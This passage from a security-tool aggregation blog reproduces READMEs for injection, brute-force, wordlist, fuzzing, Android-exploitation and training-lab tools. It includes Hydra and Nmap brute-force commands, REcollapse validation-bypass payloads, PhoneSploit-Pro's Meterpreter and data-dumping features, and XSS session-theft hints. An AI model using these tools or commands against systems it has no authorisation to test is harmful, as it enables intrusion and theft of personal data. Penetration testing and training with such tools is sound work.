  • Exception handling support (SEH and C++)
  • Adding module to some native loader structures(for basic module api support: GetModuleHandle, GetProcAdress, etc.)
  • Security cookie initialization
  • C++/CLI images are supported
  • Image unloading
  • Increase reference counter for import libraries in case of manual import mapping
  • Cyclic dependencies are handled properly

Driver features

  • Allocate/free/protect user memory
  • Read/write user and kernel memory
  • Disable permanent DEP for WOW64 processes
  • Change process protection flag
  • Change handle access rights
  • Remap process memory
  • Hiding allocated user-mode memory
  • User-mode dll injection and manual mapping
  • Manual mapping of drivers

Requirements

  • Visual Studio 2017 15.7 or higher
  • Windows SDK 10.0.17134 or higher
  • WDK 10.0.17134 or higher (driver only)
  • VC++ 2017 Libs for Spectre (x86 and x64)
  • Visual C++ ATL (x86/x64) with Spectre Mitigations


Mantra - A Tool Used To Hunt Down API Key Leaks In JS Files And Pages

By: Zion3R


The tool in question was created in Go and its main objective is to search for API keys in JavaScript files and HTML pages.

It works by checking the source code of web pages and script files for strings that are identical or similar to API keys. These keys are often used for authentication to online services such as third-party APIs and are confidential and should not be shared publicly.

By using this tool, developers can quickly identify if their API keys are leaking and take steps to fix the problem before they are compromised. Furthermore, the tool can be useful for security officers, who can use it to verify that applications and websites that use external APIs are adequately protecting their keys.

In summary, this tool is an efficient and accurate solution to help secure your API keys and prevent sensitive information leaks.


Help

Usage

Install

git clone https://github.com/MrEmpy/Mantra
cd Mantra
make
./build/mantra-amd64-linux -h

Buy me a coffee?

LivePix



ScrapPY - A Python Utility For Scraping Manuals, Documents, And Other Sensitive PDFs To Generate Wordlists That Can Be Utilized By Offensive Security Tools

By: Zion3R


ScrapPY is a Python utility for scraping manuals, documents, and other sensitive PDFs to generate targeted wordlists that can be utilized by offensive security tools to perform brute force, forced browsing, and dictionary attacks. ScrapPY performs word frequency, entropy, and metadata analysis, and can run in full output modes to craft custom wordlists for targeted attacks. The tool dives deep to discover keywords and phrases leading to potential passwords or hidden directories, outputting to a text file that is readable by tools such as Hydra, Dirb, and Nmap. Expedite initial access, vulnerability discovery, and lateral movement with ScrapPY!


Install:

Download Repository:

$ mkdir ScrapPY
$ cd ScrapPY/
$ sudo git clone https://github.com/RoseSecurity/ScrapPY.git

Install Dependencies:

$ pip3 install -r requirements.txt

ScrapPY Usage:

usage: ScrapPY.py [-h] [-f FILE] [-m {word-frequency,full,metadata,entropy}] [-o OUTPUT]

Output metadata of document:

$ python3 ScrapPY.py -f example.pdf -m metadata

Output top 100 frequently used keywords to a file name Top_100_Keywords.txt:

$ python3 ScrapPY.py -f example.pdf -m word-frequency -o Top_100_Keywords.txt

Output all keywords to default ScrapPY.txt file:

$ python3 ScrapPY.py -f example.pdf

Output top 100 keywords with highest entropy rating:

$ python3 ScrapPY.py -f example.pdf -m entropy

ScrapPY Output:

# ScrapPY outputs the ScrapPY.txt file or specified name file to the directory in which the tool was ran. To view the first fifty lines of the file, run this command:

$ head -50 ScrapPY.txt

# To see how many words were generated, run this command:

$ wc -l ScrapPY.txt

Integration with Offensive Security Tools:

Easily integrate with tools such as Dirb to expedite the process of discovering hidden subdirectories:

root@RoseSecurity:~# dirb http://192.168.1.123/ /root/ScrapPY/ScrapPY.txt

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Fri May 16 13:41:45 2014
URL_BASE: http://192.168.1.123/
WORDLIST_FILES: /root/ScrapPY/ScrapPY.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://192.168.1.123/ ----
==> DIRECTORY: http://192.168.1.123/vi/
+ http://192.168.1.123/programming (CODE:200|SIZE:2726)
+ http://192.168.1.123/s7-logic/ (CODE:403|SIZE:1122)
==> DIRECTORY: http://192.168.1.123/config/
==> DIRECTORY: http://192.168.1.123/docs/
==> DIRECTORY: http://192.168.1.123/external/

Utilize ScrapPY with Hydra for advanced brute force attacks:

root@RoseSecurity:~# hydra -l root -P /root/ScrapPY/ScrapPY.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22

Enhance Nmap scripts with ScrapPY wordlists:

nmap -p445 --script smb-brute.nse --script-args userdb=users.txt,passdb=ScrapPY.txt 192.168.1.123

Future Development:

  • Allow for custom output file naming and increased verbosity
  • Integrate different modes of operation including word frequency analysis
  • Allow for metadata analysis
  • Search for high-entropy data
  • Search for path-like data
  • Implement image OCR to enumerate data from images in PDFs
  • Allow for processing of multiple PDFs


Polaris - Validation Of Best Practices In Your Kubernetes Clusters

By: Zion3R

Polaris is an open source policy engine for Kubernetes

Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.

Polaris can be run in three different modes:

  • As a dashboard - Validate Kubernetes resources against policy-as-code.
  • As an admission controller - Automatically reject or modify workloads that don't adhere to your organization's policies.
  • As a command-line tool - Incorporate policy-as-code into the CI/CD process to test local YAML files.

Validation of best practices in your Kubernetes clusters (6)

Documentation

Check out the documentation at docs.fairwinds.com

Join the Fairwinds Open Source Community

The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!

Other Projects from Fairwinds

Enjoying Polaris? Check out some of our other projects:

  • Goldilocks - Right-size your Kubernetes Deployments by compare your memory and CPU settings against actual usage
  • Pluto - Detect Kubernetes resources that have been deprecated or removed in future versions
  • Nova - Check to see if any of your Helm charts have updates available
  • rbac-manager - Simplify the management of RBAC in your Kubernetes clusters

Or check out the full list

Fairwinds Insights

If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.



Jsfinder - Fetches JavaScript Files Quickly And Comprehensively

By: Zion3R


jsFinder is a command-line tool written in Go that scans web pages to find JavaScript files linked in the HTML source code. It searches for any attribute that can contain a JavaScript file (e.g., src, href, data-main, etc.) and extracts the URLs of the files to a text file. The tool is designed to be simple to use, and it supports reading URLs from a file or from standard input.

jsFinder is useful for web developers and security professionals who want to find and analyze the JavaScript files used by a web application. By analyzing the JavaScript files, it's possible to understand the functionality of the application and detect any security vulnerabilities or sensitive information leakage.


Features

  • Reading URLs from a file or from stdin using command line arguments.
  • Running multiple HTTP GET requests concurrently to each URL.
  • Limiting the concurrency of HTTP GET requests using a flag.
  • Using a regular expression to search for JavaScript files in the response body of the HTTP GET requests.
  • Writing the found JavaScript files to a file specified in the command line arguments or to a default file named "output.txt".
  • Printing informative messages to the console indicating the status of the program's execution and the output file's location.
  • Allowing the program to run in verbose or silent mode using a flag.

Installation

jsfinder requires Go 1.20 to install successfully.Run the following command to get the repo :

go install -v github.com/kacakb/jsfinder@latest

Usage

To see which flags you can use with the tool, use the -h flag.

jsfinder -h 
Flag Description
-l Specifies the filename to read URLs from.
-c Specifies the maximum number of concurrent requests to be made. The default value is 20.
-s Runs the program in silent mode. If this flag is not set, the program runs in verbose mode.
-o Specifies the filename to write found URLs to. The default filename is output.txt.
-read Reads URLs from stdin instead of a file specified by the -l flag.

Demo

I

Fetches JavaScript files quickly and comprehensively. (6)

If you want to read from stdin and run the program in silent mode, use this command:

cat list.txt| jsfinder -read -s -o js.txt

 

II

Fetches JavaScript files quickly and comprehensively. (7)

If you want to read from a file, you should specify it with the -l flag and use this command:

jsfinder -l list.txt -s -o js.txt

You can also specify the concurrency with the -c flag.The default value is 20. If you want to read from a file, you should specify it with the -l flag and use this command:

jsfinder -l list.txt -c 50 -s -o js.txt

TODOs

  • Adding new features
  • Improving performance
  • Adding a cookie flag
  • Reading regex from a file
  • Integrating the kacak tool (coming soon)

Screenshot

Contact

If you have any questions, feedback or collaboration suggestions related to this project, please feel free to contact me via:

e-mail

Cbrutekrag - Penetration Tests On SSH Servers Using Brute Force Or Dictionary Attacks. Written In C

By: Zion3R


Penetration tests on SSH servers using dictionary attacks. Written in C.

brute krag means "brute force" in afrikáans

Disclaimer

This tool is for ethical testing purpose only.
cbrutekrag and its owners can't be held responsible for misuse by users.
Users have to act as permitted by local law rules.

 

Requirements

cbrutekrag uses libssh - The SSH Library (http://www.libssh.org/)

Build

Requirements:

  • make
  • gcc compiler
  • libssh-dev
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
make
make install

Static build

Requirements:

  • cmake
  • gcc compiler
  • make
  • libssl-dev
  • libz-dev
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
bash static-build.sh
make install

Run

OpenSSH Brute force tool 0.5.0 __/ | (c) Copyright 2014-2022 Jorge Matricali |___/ usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst] [-t THREADS] [-o OUTPUT.txt] [TARGETS...] -h This help -v Verbose mode -V Verbose mode (sshlib) -s Scan mode -D Dry run -P Progress bar -T <targets> Targets file -C <combinations> Username and password file -t <threads> Max threads -o <output> Output log file -a Accepts non OpenSSH servers -A Allow servers detected as honeypots." dir="auto">
$ cbrutekrag -h
_ _ _
| | | | | |
___ | |__ _ __ _ _| |_ ___| | ___ __ __ _ __ _
/ __|| '_ \| '__| | | | __/ _ \ |/ / '__/ _` |/ _` |
| (__ | |_) | | | |_| | || __/ <| | | (_| | (_| |
\___||_.__/|_| \__,_|\__\___|_|\_\_| \__,_|\__, |
OpenSSH Brute force tool 0.5.0 __/ |
(c) Copyright 2014-2022 Jorge Matricali |___/


usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst]
[-t THREADS] [-o OUTPUT.txt] [TARGETS...]

-h This help
-v Verbose mode
-V Verbose mode (sshlib)
-s Scan mode
-D Dry run
-P Progress bar
-T <targets> Targets file
-C <combinations> Username and password file -t <threads> Max threads
-o <output> Output log file
-a Accepts non OpenSSH servers
-A Allow servers detected as honeypots.

Example usages

cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24

Supported targets syntax

  • 192.168.0.1
  • 10.0.0.0/8
  • 192.168.100.0/24:2222
  • 127.0.0.1:2222

Combinations file format

root root
root password
root $BLANKPASS$


PassMute - PassMute - A Multi Featured Password Transmutation/Mutator Tool

By: Zion3R


This is a command-line tool written in Python that applies one or more transmutation rules to a given password or a list of passwords read from one or more files. The tool can be used to generate transformed passwords for security testing or research purposes. Also, while you doing pentesting it will be very useful tool for you to brute force the passwords!!


How Passmute can also help to secure our passwords more?

PassMute can help to generate strong and complex passwords by applying different transformation rules to the input password. However, password security also depends on other factors such as the length of the password, randomness, and avoiding common phrases or patterns.

The transformation rules include:

reverse: reverses the password string

uppercase: converts the password to uppercase letters

lowercase: converts the password to lowercase letters

swapcase: swaps the case of each letter in the password

capitalize: capitalizes the first letter of the password

leet: replaces some letters in the password with their leet equivalents

strip: removes all whitespace characters from the password

The tool can also write the transformed passwords to an output file and run the transformation process in parallel using multiple threads.

Installation

git clone https://HITH-Hackerinthehouse/PassMute.git
cd PassMute
chmod +x PassMute.py

Usage To use the tool, you need to have Python 3 installed on your system. Then, you can run the tool from the command line using the following options:

python PassMute.py [-h] [-f FILE [FILE ...]] -r RULES [RULES ...] [-v] [-p PASSWORD] [-o OUTPUT] [-t THREAD_TIMEOUT] [--max-threads MAX_THREADS]

Here's a brief explanation of the available options:

-h or --help: shows the help message and exits

-f (FILE) [FILE ...], --file (FILE) [FILE ...]: one or more files to read passwords from

-r (RULES) [RULES ...] or --rules (RULES) [RULES ...]: one or more transformation rules to apply

-v or --verbose: prints verbose output for each password transformation

-p (PASSWORD) or --password (PASSWORD): transforms a single password

-o (OUTPUT) or --output (OUTPUT): output file to save the transformed passwords

-t (THREAD_TIMEOUT) or --thread-timeout (THREAD_TIMEOUT): timeout for threads to complete (in seconds)

--max-threads (MAX_THREADS): maximum number of threads to run simultaneously (default: 10)

NOTE: If you are getting any error regarding argparse module then simply install the module by following command: pip install argparse

Examples

Here are some example commands those read passwords from a file, applies two transformation rules, and saves the transformed passwords to an output file:

Single Password transmutation: python PassMute.py -p HITHHack3r -r leet reverse swapcase -v -t 50

Multiple Password transmutation: python PassMute.py -f testwordlists.txt -r leet reverse -v -t 100 -o testupdatelists.txt

Here Verbose and Thread are recommended to use in case you're transmutating big files and also it depends upon your microprocessor as well, it's not required every time to use threads and verbose mode.

Legal Disclaimer:

You might be super excited to use this tool, we too. But here we need to confirm! Hackerinthehouse, any contributor of this project and Github won't be responsible for any actions made by you. This tool is made for security research and educational purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.



REcollapse Is A Helper Tool For Black-Box Regex Fuzzing To Bypass Validations And Discover Normalizations In Web Applications

By: Zion3R


REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications.

It can also be helpful to bypass WAFs and weak vulnerability mitigations. For more information, take a look at the REcollapse blog post.

The goal of this tool is to generate payloads for testing. Actual fuzzing shall be done with other tools like Burp (intruder), ffuf, or similar.


Installation

Requirements: Python 3

pip3 install --user --upgrade -r requirements.txt or ./install.sh

Docker

docker build -t recollapse . or docker pull 0xacb/recollapse


Usage

$ recollapse -h
usage: recollapse [-h] [-p POSITIONS] [-e {1,2,3}] [-r RANGE] [-s SIZE] [-f FILE]
[-an] [-mn MAXNORM] [-nt]
[input]

REcollapse is a helper tool for black-box regex fuzzing to bypass validations and
discover normalizations in web applications

positional arguments:
input original input

options:
-h, --help show this help message and exit
-p POSITIONS, --positions POSITIONS
pivot position modes. Example: 1,2,3,4 (default). 1: starting,
2: separator, 3: normalization, 4: termination
-e {1,2,3}, --encoding {1,2,3}
1: URL-encoded format (default), 2: Unicode format, 3: Raw
format
-r RANGE, --range RANGE
range of bytes for fuzzing. Example: 0,0xff (default)
-s SIZE, --size SIZE numb er of fuzzing bytes (default: 1)
-f FILE, --file FILE read input from file
-an, --alphanum include alphanumeric bytes in fuzzing range
-mn MAXNORM, --maxnorm MAXNORM
maximum number of normalizations (default: 3)
-nt, --normtable print normalization table

Detailed options explanation

Let's consider this_is.an_example as the input.

Positions

  1. Fuzz the beginning of the input: $this_is.an_example
  2. Fuzz the before and after special characters: this$_$is$.$an$_$example
  3. Fuzz normalization positions: replace all possible bytes according to the normalization table
  4. Fuzz the end of the input: this_is.an_example$

Encoding

  1. URL-encoded format to be used with application/x-www-form-urlencoded or query parameters: %22this_is.an_example
  2. Unicode format to be used with application/json: \u0022this_is.an_example
  3. Raw format to be used with multipart/form-data: "this_is.an_example

Range

Specify a range of bytes for fuzzing: -r 1-127. This will exclude alphanumeric characters unless the -an option is provided.

Size

Specify the size of fuzzing for positions 1, 2 and 4. The default approach is to fuzz all possible values for one byte. Increasing the size will consume more resources and generate many more inputs, but it can lead to finding new bypasses.

File

Input can be provided as a positional argument, stdin, or a file through the -f option.

Alphanumeric

By default, alphanumeric characters will be excluded from output generation, which is usually not interesting in terms of responses. You can allow this with the -an option.

Maximum number or normalizations

Not all normalization libraries have the same behavior. By default, three possibilities for normalizations are generated for each input index, which is usually enough. Use the -mn option to go further.

Normalization table

Use the -nt option to show the normalization table.


Example

$ recollapse -e 1 -p 1,2,4 -r 10-11 https://legit.example.com
%0ahttps://legit.example.com
%0bhttps://legit.example.com
https%0a://legit.example.com
https%0b://legit.example.com
https:%0a//legit.example.com
https:%0b//legit.example.com
https:/%0a/legit.example.com
https:/%0b/legit.example.com
https://%0alegit.example.com
https://%0blegit.example.com
https://legit%0a.example.com
https://legit%0b.example.com
https://legit.%0aexample.com
https://legit.%0bexample.com
https://legit.example%0a.com
https://legit.example%0b.com
https://legit.example.%0acom
https://legit.example.%0bcom
https://legit.example.com%0a
https://legit.example.com%0b

Resources

This technique has been presented on BSidesLisbon 2022

Blog post: https://0xacb.com/2022/11/21/recollapse/

Slides:

Videos:

Normalization table: https://0xacb.com/normalization_table


Thanks

and



PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


An all-in-one hacking tool written in Python to remotely exploit Android devices using ADB (Android Debug Bridge) and Metasploit-Framework.

Complete Automation to get a Meterpreter session in One Click

This tool can automatically Create, Install, and Run payload on the target device using Metasploit-Framework and ADB to completely hack the Android Device in one click.

The goal of this project is to make penetration testing on Android devices easy. Now you don't have to learn commands and arguments, PhoneSploit Pro does it for you. Using this tool, you can test the security of your Android devices easily.

PhoneSploit Pro can also be used as a complete ADB Toolkit to perform various operations on Android devices over Wi-Fi as well as USB.

 

Features

v1.0

  • Connect device using ADB remotely.
  • List connected devices.
  • Disconnect all devices.
  • Access connected device shell.
  • Stop ADB Server.
  • Take screenshot and pull it to computer automatically.
  • Screen Record target device screen for a specified time and automatically pull it to computer.
  • Download file/folder from target device.
  • Send file/folder from computer to target device.
  • Run an app.
  • Install an APK file from computer to target device.
  • Uninstall an app.
  • List all installed apps in target device.
  • Restart/Reboot the target device to System, Recovery, Bootloader, Fastboot.
  • Hack Device Completely :
    • Automatically fetch your IP Address to set LHOST.
    • Automatically create a payload using msfvenom, install it, and run it on target device.
    • Then automatically launch and setup Metasploit-Framework to get a meterpreter session.
    • Getting a meterpreter session means the device is completely hacked using Metasploit-Framework, and you can do anything with it.

v1.1

  • List all files and folders of the target devices.
  • Copy all WhatsApp Data to computer.
  • Copy all Screenshots to computer.
  • Copy all Camera Photos to computer.
  • Take screenshots and screen-record anonymously (Automatically delete file from target device).
  • Open a link on target device.
  • Display an image/photo on target device.
  • Play an audio on target device.
  • Play a video on target device.
  • Get device information.
  • Get battery information.
  • Use Keycodes to control device remotely.

v1.2

  • Send SMS through target device.
  • Unlock device (Automatic screen on, swipe up and password input).
  • Lock device.
  • Dump all SMS from device to computer.
  • Dump all Contacts from device to computer.
  • Dump all Call Logs from device to computer.
  • Extract APK from an installed app.

v1.3

  • Mirror and Control the target device.

v1.4

  • Power off the target device.

Requirements

Run PhoneSploit Pro

PhoneSploit Pro does not need any installation and runs directly using python3

On Linux / macOS :

Make sure all the required software are installed.

Open terminal and paste the following commands :

git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git
cd PhoneSploit-Pro/
python3 phonesploitpro.py

On Windows :

Make sure all the required software are installed.

Open terminal and paste the following commands :

git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git
cd PhoneSploit-Pro/
  1. Download and extract latest platform-tools from here.

  2. Copy all files from the extracted platform-tools or adb directory to PhoneSploit-Pro directory and then run :

python phonesploitpro.py

Screenshots

Installing ADB

ADB on Linux :

Open terminal and paste the following commands :

  • Debian / Ubuntu
sudo apt update
sudo apt install adb
  • Fedora
sudo dnf install adb
  • Arch Linux / Manjaro
sudo pacman -Sy android-tools

For other Linux Distributions : Visit this Link

ADB on macOS :

Open terminal and paste the following command :

brew install android-platform-tools

or Visit this link : Click Here

ADB on Windows :

Visit this link : Click Here

ADB on Termux :

pkg update
pkg install android-tools

Installing Metasploit-Framework

On Linux / macOS :

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

or Follow this link : Click Here

or Visit this link : Click Here

On Windows :

Visit this link : Click Here

or Follow this link : Click Here

Installing scrcpy

Visit the scrcpy GitHub page for latest installation instructions : Click Here

On Windows : Copy all the files from the extracted scrcpy folder to PhoneSploit-Pro folder.

If scrcpy is not available for your Linux distro, then you can build it with a few simple steps : Build Guide

Tutorial

Setting up Android Phone for the first time

  • Enabling the Developer Options
  1. Open Settings.
  2. Go to About Phone.
  3. Find Build Number.
  4. Tap on Build Number 7 times.
  5. Enter your pattern, PIN or password to enable the Developer options menu.
  6. The Developer options menu will now appear in your Settings menu.
  • Enabling USB Debugging
  1. Open Settings.
  2. Go to System > Developer options.
  3. Scroll down and Enable USB debugging.
  • Connecting with Computer
  1. Connect your Android device and adb host computer to a common Wi-Fi network.
  2. Connect the device to the host computer with a USB cable.
  3. Open terminal in the computer and enter the following command :
adb devices
  1. A pop-up will appear in the Android phone when you connect your phone to a new PC for the first time : Allow USB debugging?.
  2. Click on Always allow from this computer check-box and then click Allow.
  3. Then enter the following command :
adb tcpip 5555
  1. Now you can connect the Android Phone over Wi-Fi.
  2. Disconnect the USB cable.
  3. Go to Settings > About Phone > Status > IP address and note the phone's IP Address.
  4. Run PhoneSploit Pro and select Connect a device and enter the target's IP Address to connect over Wi-Fi.

Connecting the Android phone for the next time

  1. Connect your Android device and host computer to a common Wi-Fi network.
  2. Run PhoneSploit Pro and select Connect a device and enter the target's IP Address to connect over Wi-Fi.

This tool is tested on

  • ✅Ubuntu
  • ✅Linux Mint
  • ✅Kali Linux
  • ✅Fedora
  • ✅Arch Linux
  • ✅Parrot Security OS
  • ✅Windows 11
  • ✅Termux (Android)

All the new features are primarily tested on Linux, thus Linux is recommended for running PhoneSploit Pro. Some features might not work properly on Windows.

Disclaimer

  • Neither the project nor its developer promote any kind of illegal activity and are not responsible for any misuse or damage caused by this project.
  • This project is for the purpose of penetration testing only.
  • Please do not use this tool on other people's devices without their permission.
  • Do not use this tool to harm others.
  • Use this project responsibly on your own devices only.
  • It is the end user's responsibility to obey all applicable local, state, federal, and international laws.


QuadraInspect - Android Framework That Integrates AndroPass, APKUtil, And MobFS, Providing A Powerful Tool For Analyzing The Security Of Android Applications


The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines three powerful tools - AndroPass, APKUtil, RMS, and MobFS - to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.

QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass is a tool that focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil is a tool that extracts valuable information from an APK file. Lastly, MobFS and RMS facilitates the analysis of an application's filesystem by mounting its storage in a virtual environment.

By combining these three tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all three tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.


Requirements

  • Windows, Linux or Mac
  • NodeJs installed
  • Python 3 installed
  • OpenSSL-3 installed
  • Wkhtmltopdf installed

Installation

To install the tools you need to: First : git clone https://github.com/morpheuslord/QuadraInspect

Second Open a Administrative cmd or powershell (for Mobfs setup) and run : pip install -r requirements.txt && python3 main.py

Third : Once QuadraInspect loads run this command QuadraInspect Main>> : START install_tools

The tools will be downloaded to the tools directory and also the setup.py and setup.bat commands will run automatically for the complete installation.

Usage

Each module has a help function so that the commands and the discriptions are detailed and can be altered for operation.

These are the key points that must be addressed for smooth working:

  • The APK file or target must be declared before starting any attack
  • The Attacks are seperate entities combined via this framework doing research on how to use them is recommended.
  • The APK file can be ether declared ether using args or using SET target withing the tool.
  • The target APK file must be placed in the target folder as all the tool searches for the target file with that folder.

Modes

There are 2 modes:

|
└─> F mode
└─> A mode

F mode

The f mode is a mode where you get the active interface for using the interactive vaerion of the framework with the prompt, etc.

F mode is the normal mode and can be used easily

A mode

A mode or argumentative mode takes the input via arguments and runs the commands without any intervention by the user this is limited to the main menu in the future i am planning to extend this feature to even the encorporated codes.

python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks

Main Module

the main menu of the entire tool has these options and commands:

Command Discription
SET target SET the name of the targetfile
START install_tools If not installed this will install the tools
LIST tools_name List out the Tools Intigrated
START apkleaks Use APKLeaks tool
START mobfs Use MOBfs for dynamic and static analysis
START andropass Use AndroPass APK analizer
help Display help menu
SHOW banner Display banner
quit Quit the program

As mentioned above the target must be set before any tool is used.

Apkleaks menu

The APKLeaks menu is also really straight forward and only a few things to consider:

  • The options SET output and SET json-out takes file names not the actual files it creates an output in the result directory.
  • The SET pattern option takes a name of a json pattern file. The JSON file must be located in the pattern directory
OPTION SET Value
SET output Output for the scan data file name
SET arguments Additional Disassembly arguments
SET json-out JSON output file name
SET pattern The pre-searching pattern for secrets
help Displays help menu
return Return to main menu
quit Quit the tool

Mobfs

Mobfs is pritty straight forward only the port number must be taken care of which is by default on port 5000 you just need to start the program and connect to it on 127.0.0.1:5000 over your browser.

AndroPass

AndroPass is also really straight forward it just takes the file as input and does its job without any other inputs.

Architecture:

The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:

  • Core module: The core module will provide the basic functionality of the framework, such as command-line interface, input/output handling, and logging.
  • Static analysis module: The static analysis module will be responsible for analyzing the structure and content of APK files, such as the manifest file, resources, and code.
  • Dynamic analysis module: The dynamic analysis module will be responsible for analyzing the behavior of APK files, such as network traffic, API calls, and file system interactions.
  • Reverse engineering module: The reverse engineering module will be responsible for decompiling and analyzing the source code of APK files.
  • Vulnerability testing module: The vulnerability testing module will be responsible for testing the security of APK files, such as identifying vulnerabilities and exploits.

Adding more

Currentluy there only 3 but if wanted people can add more tools to this these are the things to be considered:

  • Installer function
  • Seperate tool function
  • Main function

Installer Function

  • Must edit in the config/installer.py
  • The things to consider in the installer is the link for the repository.
  • keep the cloner and the directory in a try-except condition to avoide errors.
  • choose an appropriate command for further installation

Seperate tool function

  • Must edit in the config/mobfs.py , config/androp.py, config/apkleaks.py
  • Write a new function for the specific tool
  • File handeling is up to you I recommend passing the file name as an argument and then using the name to locate the file using the subprocess function
  • the tools must also recommended to be in a try-except condition to avoide unwanted errors.

Main Function

  • A new case must be added to the switch function to act as a main function holder
  • the help menu listing and commands are up to your requirements and comfort

If wanted you could do your upgrades and add it to this repository for more people to use kind of growing this tool.



Web-Hacking-Playground - Web Application With Vulnerabilities Found In Real Cases, Both In Pentests And In Bug Bounty Programs


Web Hacking Playground is a controlled web hacking environment. It consists of vulnerabilities found in real cases, both in pentests and in Bug Bounty programs. The objective is that users can practice with them, and learn to detect and exploit them.

Other topics of interest will also be addressed, such as: bypassing filters by creating custom payloads, executing chained attacks exploiting various vulnerabilities, developing proof-of-concept scripts, among others.


Important

The application source code is visible. However, the lab's approach is a black box one. Therefore, the code should not be reviewed to resolve the challenges.

Additionally, it should be noted that fuzzing (both parameters and directories) and brute force attacks do not provide any advantage in this lab.

Setup

It is recommended to use Kali Linux to perform this lab. In case of using a virtual machine, it is advisable to use the VMware Workstation Player hypervisor.

The environment is based on Docker and Docker Compose, so it is necessary to have both installed.

To install Docker on Kali Linux, run the following commands:

sudo apt update -y
sudo apt install -y docker.io
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

To install Docker on other Debian-based distributions, run the following commands:

curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

It is recommended to log out and log in again so that the user is recognized as belonging to the docker group.

To install Docker Compose, run the following command:

sudo apt install -y docker-compose

Note: In case of using M1 it is recommended to execute the following command before building the images:

export DOCKER_DEFAULT_PLATFORM=linux/amd64

The next step is to clone the repository and build the Docker images:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose build

Also, it is recommended to install the Foxy Proxy browser extension, which allows you to easily change proxy settings, and Burp Suite, which we will use to intercept HTTP requests.

We will create a new profile in Foxy Proxy to use Burp Suite as a proxy. To do this, we go to the Foxy Proxy options, and add a proxy with the following configuration:

  • Proxy Type: HTTP
  • Proxy IP address: 127.0.0.1
  • Port: 8080

Deployment

Once everything you need is installed, you can deploy the environment with the following command:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose up -d

This will create two containers of applications developed in Flask on port 80:

  • The vulnerable web application (Socially): Simulates a social network.
  • The exploit server: You should not try to hack it, since it does not have any vulnerabilities. Its objective is to simulate a victim's access to a malicious link.

Important

It is necessary to add the IP of the containers to the /etc/hosts file, so that they can be accessed by name and that the exploit server can communicate with the vulnerable web application. To do this, run the following commands:

sudo sed -i '/whp-/d' /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-socially) whp-socially" | sudo tee -a /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-exploitserver) whp-exploitserver" | sudo tee -a /etc/hosts

Once this is done, the vulnerable application can be accessed from http://whp-socially and the exploit server from http://whp-exploitserver.

When using the exploit server, the above URLs must be used, using the domain name and not the IPs. This ensures correct communication between containers.

When it comes to hacking, to represent the attacker's server, the local Docker IP must be used, since the lab is not intended to make requests to external servers such as Burp Collaborator, Interactsh, etc. A Python http.server can be used to simulate a web server and receive HTTP interactions. To do this, run the following command:

sudo python3 -m http.server 80

Stages

The environment is divided into three stages, each with different vulnerabilities. It is important that they are done in order, as the vulnerabilities in the following stages build on those in the previous stages. The stages are:

  • Stage 1: Access with any user
  • Stage 2: Access as admin
  • Stage 3: Read the /flag file

Important

Below are spoilers for each stage's vulnerabilities. If you don't need help, you can skip this section. On the other hand, if you don't know where to start, or want to check if you're on the right track, you can extend the section that interests you.

Stage 1: Access with any user

Display

At this stage, a specific user's session can be stolen through Cross-Site Scripting (XSS), which allows JavaScript code to be executed. To do this, the victim must be able to access a URL in the user's context, this behavior can be simulated with the exploit server.

The hints to solve this stage are:

  • Are there any striking posts on the home page?
  • You have to chain two vulnerabilities to steal the session. XSS is achieved by exploiting an Open Redirect vulnerability, where the victim is redirected to an external URL.
